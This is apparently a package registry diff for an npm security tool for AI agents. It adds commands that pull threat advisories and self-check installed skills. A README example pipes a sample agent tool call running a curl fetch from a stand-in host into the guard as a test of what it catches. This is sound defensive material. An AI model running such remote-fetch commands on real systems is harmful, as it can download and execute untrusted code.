@goplus/agentguard 1.1.3 → 1.1.4
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- package/README.md +8 -0
- package/dist/cli.js +163 -0
- package/dist/cli.js.map +1 -1
- package/dist/cloud/client.d.ts +22 -0
- package/dist/cloud/client.d.ts.map +1 -1
- package/dist/cloud/client.js +61 -2
- package/dist/cloud/client.js.map +1 -1
- package/dist/config.d.ts.map +1 -1
- package/dist/config.js +4 -2
- package/dist/config.js.map +1 -1
- package/dist/feed/selfcheck.d.ts +36 -0
- package/dist/feed/selfcheck.d.ts.map +1 -0
- package/dist/feed/selfcheck.js +198 -0
- package/dist/feed/selfcheck.js.map +1 -0
- package/dist/feed/state.d.ts +14 -0
- package/dist/feed/state.d.ts.map +1 -0
- package/dist/feed/state.js +57 -0
- package/dist/feed/state.js.map +1 -0
- package/dist/feed/types.d.ts +102 -0
- package/dist/feed/types.d.ts.map +1 -0
- package/dist/feed/types.js +15 -0
- package/dist/feed/types.js.map +1 -0
- package/dist/tests/feed-cloud.test.d.ts +2 -0
- package/dist/tests/feed-cloud.test.d.ts.map +1 -0
- package/dist/tests/feed-cloud.test.js +93 -0
- package/dist/tests/feed-cloud.test.js.map +1 -0
- package/dist/tests/feed-selfcheck.test.d.ts +2 -0
- package/dist/tests/feed-selfcheck.test.d.ts.map +1 -0
- package/dist/tests/feed-selfcheck.test.js +118 -0
- package/dist/tests/feed-selfcheck.test.js.map +1 -0
- package/dist/tests/runtime-cloud.test.js +6 -2
- package/dist/tests/runtime-cloud.test.js.map +1 -1
- package/package.json +1 -1
package/README.md
CHANGED
|
@@ -67,6 +67,14 @@ printf '{"tool_name":"Bash","tool_input":{"command":"curl https://example.com/in
|
|
|
67
67
|
# Optional: connect paid AgentGuard Cloud policy, audit, and approvals
|
|
68
68
|
AGENTGUARD_API_KEY=ag_live_xxxxx agentguard connect --url https://agentguard.gopluslabs.io
|
|
69
69
|
|
|
70
|
+
# Optional: subscribe to AgentGuard's threat-intelligence feed. Pulls newly
|
|
71
|
+
# published advisories from Cloud, runs a self-check against your installed
|
|
72
|
+
# skills, and reports matches back. Run in cron / on boot.
|
|
73
|
+
agentguard subscribe
|
|
74
|
+
|
|
75
|
+
# Or run a one-off self-check against a single advisory id
|
|
76
|
+
agentguard checkup --against-advisory AGS-2026-0042
|
|
77
|
+
|
|
70
78
|
# Optional: write host-specific hook templates
|
|
71
79
|
agentguard init --agent claude-code
|
|
72
80
|
agentguard init --agent codex
|
package/dist/cli.js
CHANGED
|
@@ -10,6 +10,8 @@ const protect_js_1 = require("./runtime/protect.js");
|
|
|
10
10
|
const policy_js_1 = require("./runtime/policy.js");
|
|
11
11
|
const installers_js_1 = require("./installers.js");
|
|
12
12
|
const version_js_1 = require("./version.js");
|
|
13
|
+
const selfcheck_js_1 = require("./feed/selfcheck.js");
|
|
14
|
+
const state_js_1 = require("./feed/state.js");
|
|
13
15
|
async function main() {
|
|
14
16
|
const program = new commander_1.Command();
|
|
15
17
|
program
|
|
@@ -153,6 +155,167 @@ async function main() {
|
|
|
153
155
|
console.log((0, protect_js_1.formatProtectResult)(result, Boolean(options.json)));
|
|
154
156
|
process.exitCode = (0, protect_js_1.exitCodeForDecision)(result.decision);
|
|
155
157
|
});
|
|
158
|
+
program
|
|
159
|
+
.command('subscribe')
|
|
160
|
+
.description('Pull new threat-feed advisories from AgentGuard Cloud and run a self-check against locally installed skills')
|
|
161
|
+
.option('--since <iso>', 'Override the persisted last-pulled timestamp')
|
|
162
|
+
.option('--json', 'Emit machine-readable summary instead of human text')
|
|
163
|
+
.option('--no-report', 'Skip uploading self-check results back to Cloud')
|
|
164
|
+
.action(async (options) => {
|
|
165
|
+
const config = (0, config_js_1.ensureConfig)();
|
|
166
|
+
const client = new client_js_1.AgentGuardCloudClient(config);
|
|
167
|
+
const state = (0, state_js_1.loadFeedState)();
|
|
168
|
+
const since = options.since ?? state.lastPulledAt;
|
|
169
|
+
let advisories;
|
|
170
|
+
try {
|
|
171
|
+
advisories = await client.pullAdvisories(since);
|
|
172
|
+
}
|
|
173
|
+
catch (err) {
|
|
174
|
+
console.error(`! Could not reach AgentGuard Cloud: ${err.message}`);
|
|
175
|
+
process.exitCode = 1;
|
|
176
|
+
return;
|
|
177
|
+
}
|
|
178
|
+
if (advisories === null) {
|
|
179
|
+
// 404 — older Cloud build without the feed endpoint. Not an error.
|
|
180
|
+
if (options.json) {
|
|
181
|
+
console.log(JSON.stringify({ supported: false, results: [] }));
|
|
182
|
+
}
|
|
183
|
+
else {
|
|
184
|
+
console.log('AgentGuard Cloud does not expose /api/v1/feed/advisories yet — nothing to do.');
|
|
185
|
+
}
|
|
186
|
+
return;
|
|
187
|
+
}
|
|
188
|
+
const seen = new Set(state.seenAdvisoryIds ?? []);
|
|
189
|
+
// Process oldest-first so the cursor can advance monotonically and we
|
|
190
|
+
// never skip over an advisory that failed mid-batch.
|
|
191
|
+
const fresh = advisories
|
|
192
|
+
.filter((a) => !seen.has(a.id))
|
|
193
|
+
.sort((a, b) => (a.publishedAt < b.publishedAt ? -1 : 1));
|
|
194
|
+
const results = [];
|
|
195
|
+
let cursorOk = true; // stops advancing on the first hard failure
|
|
196
|
+
let latestPublishedAt = state.lastPulledAt;
|
|
197
|
+
let hardFailures = 0;
|
|
198
|
+
for (const advisory of fresh) {
|
|
199
|
+
let processed = true;
|
|
200
|
+
let result;
|
|
201
|
+
try {
|
|
202
|
+
result = await (0, selfcheck_js_1.runSelfCheckForAdvisory)(advisory);
|
|
203
|
+
}
|
|
204
|
+
catch (err) {
|
|
205
|
+
// runSelfCheck shouldn't throw, but if it does the advisory has
|
|
206
|
+
// not been evaluated — don't mark it seen and don't advance.
|
|
207
|
+
console.error(`! Self-check threw for ${advisory.id}: ${err.message}`);
|
|
208
|
+
hardFailures += 1;
|
|
209
|
+
cursorOk = false;
|
|
210
|
+
continue;
|
|
211
|
+
}
|
|
212
|
+
results.push(result);
|
|
213
|
+
if (options.report !== false && client.connected && result.matchedArtifacts.length > 0) {
|
|
214
|
+
// Report is on the critical path — if Cloud doesn't see the
|
|
215
|
+
// match, we must NOT mark the advisory seen, otherwise a
|
|
216
|
+
// transient network blip silently buries a real hit.
|
|
217
|
+
try {
|
|
218
|
+
await client.reportSelfCheck(advisory.id, result.matchedArtifacts, {
|
|
219
|
+
elapsedMs: result.elapsedMs,
|
|
220
|
+
warnings: result.warnings,
|
|
221
|
+
});
|
|
222
|
+
}
|
|
223
|
+
catch (err) {
|
|
224
|
+
console.error(`! Failed to report self-check for ${advisory.id}: ${err.message}`);
|
|
225
|
+
processed = false;
|
|
226
|
+
hardFailures += 1;
|
|
227
|
+
}
|
|
228
|
+
}
|
|
229
|
+
if (processed) {
|
|
230
|
+
Object.assign(state, (0, state_js_1.markAdvisorySeen)(state, advisory.id));
|
|
231
|
+
if (cursorOk && (!latestPublishedAt || advisory.publishedAt > latestPublishedAt)) {
|
|
232
|
+
latestPublishedAt = advisory.publishedAt;
|
|
233
|
+
}
|
|
234
|
+
}
|
|
235
|
+
else {
|
|
236
|
+
// From this point we no longer advance the pull cursor — the
|
|
237
|
+
// failed advisory must be re-pulled on the next run.
|
|
238
|
+
cursorOk = false;
|
|
239
|
+
}
|
|
240
|
+
}
|
|
241
|
+
state.lastPulledAt = latestPublishedAt;
|
|
242
|
+
(0, state_js_1.saveFeedState)(state);
|
|
243
|
+
if (options.json) {
|
|
244
|
+
console.log(JSON.stringify({ supported: true, pulled: advisories.length, fresh: fresh.length, results }, null, 2));
|
|
245
|
+
return;
|
|
246
|
+
}
|
|
247
|
+
const totalMatches = results.reduce((acc, r) => acc + r.matchedArtifacts.length, 0);
|
|
248
|
+
console.log(`Pulled ${advisories.length} advisory record(s); ${fresh.length} new.`);
|
|
249
|
+
if (fresh.length === 0)
|
|
250
|
+
return;
|
|
251
|
+
console.log(`Self-check found ${totalMatches} match(es) across the new advisories.`);
|
|
252
|
+
for (const r of results) {
|
|
253
|
+
if (r.matchedArtifacts.length === 0)
|
|
254
|
+
continue;
|
|
255
|
+
console.log(` - ${r.advisoryId}: ${r.matchedArtifacts.length} match(es)`);
|
|
256
|
+
for (const m of r.matchedArtifacts) {
|
|
257
|
+
console.log(` · ${m.path} [${m.matchedBy}]`);
|
|
258
|
+
}
|
|
259
|
+
}
|
|
260
|
+
// Exit codes: 2 = matches found, 1 = at least one advisory failed
|
|
261
|
+
// to evaluate or report (cursor was held back), 0 = clean.
|
|
262
|
+
if (hardFailures > 0) {
|
|
263
|
+
console.error(`! ${hardFailures} advisory record(s) failed to process and will be re-pulled next run.`);
|
|
264
|
+
process.exitCode = 1;
|
|
265
|
+
}
|
|
266
|
+
else if (totalMatches > 0) {
|
|
267
|
+
process.exitCode = 2;
|
|
268
|
+
}
|
|
269
|
+
else {
|
|
270
|
+
process.exitCode = 0;
|
|
271
|
+
}
|
|
272
|
+
});
|
|
273
|
+
program
|
|
274
|
+
.command('checkup')
|
|
275
|
+
.description('Run a self-check immediately. Without --against-advisory, scans for everything in the feed cache.')
|
|
276
|
+
.option('--against-advisory <id>', 'Restrict the check to a single advisory id (fetches it from Cloud if needed)')
|
|
277
|
+
.option('--json', 'Emit machine-readable result')
|
|
278
|
+
.action(async (options) => {
|
|
279
|
+
const config = (0, config_js_1.ensureConfig)();
|
|
280
|
+
const client = new client_js_1.AgentGuardCloudClient(config);
|
|
281
|
+
const advisoryId = options.againstAdvisory;
|
|
282
|
+
if (!advisoryId) {
|
|
283
|
+
console.log('Tip: pass --against-advisory <id> for now. A broader, full-fleet checkup is coming.');
|
|
284
|
+
console.log('Meanwhile, run `agentguard subscribe` to pull the feed and self-check new entries.');
|
|
285
|
+
return;
|
|
286
|
+
}
|
|
287
|
+
let advisory = null;
|
|
288
|
+
try {
|
|
289
|
+
const all = await client.pullAdvisories();
|
|
290
|
+
advisory = all?.find((a) => a.id === advisoryId) ?? null;
|
|
291
|
+
}
|
|
292
|
+
catch (err) {
|
|
293
|
+
console.error(`! Could not reach AgentGuard Cloud: ${err.message}`);
|
|
294
|
+
process.exitCode = 1;
|
|
295
|
+
return;
|
|
296
|
+
}
|
|
297
|
+
if (!advisory) {
|
|
298
|
+
console.error(`No advisory with id "${advisoryId}" found in the current feed window.`);
|
|
299
|
+
process.exitCode = 1;
|
|
300
|
+
return;
|
|
301
|
+
}
|
|
302
|
+
const result = await (0, selfcheck_js_1.runSelfCheckForAdvisory)(advisory);
|
|
303
|
+
if (options.json) {
|
|
304
|
+
console.log(JSON.stringify(result, null, 2));
|
|
305
|
+
}
|
|
306
|
+
else {
|
|
307
|
+
console.log(`Advisory ${result.advisoryId}: ${result.matchedArtifacts.length} match(es)`);
|
|
308
|
+
for (const m of result.matchedArtifacts) {
|
|
309
|
+
console.log(` · ${m.path} [${m.matchedBy}]`);
|
|
310
|
+
}
|
|
311
|
+
if (result.warnings.length) {
|
|
312
|
+
console.log('Warnings:');
|
|
313
|
+
for (const w of result.warnings)
|
|
314
|
+
console.log(` ! ${w}`);
|
|
315
|
+
}
|
|
316
|
+
}
|
|
317
|
+
process.exitCode = result.matchedArtifacts.length > 0 ? 2 : 0;
|
|
318
|
+
});
|
|
156
319
|
await program.parseAsync(process.argv);
|
|
157
320
|
}
|
|
158
321
|
function readStdinIfAvailable() {
|
package/dist/cli.js.map
CHANGED
|
@@ -1 +1 @@
|
|
|
1
|
-
{"version":3,"file":"cli.js","sourceRoot":"","sources":["../src/cli.ts"],"names":[],"mappings":"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"}
|
|
1
|
+
{"version":3,"file":"cli.js","sourceRoot":"","sources":["../src/cli.ts"],"names":[],"mappings":"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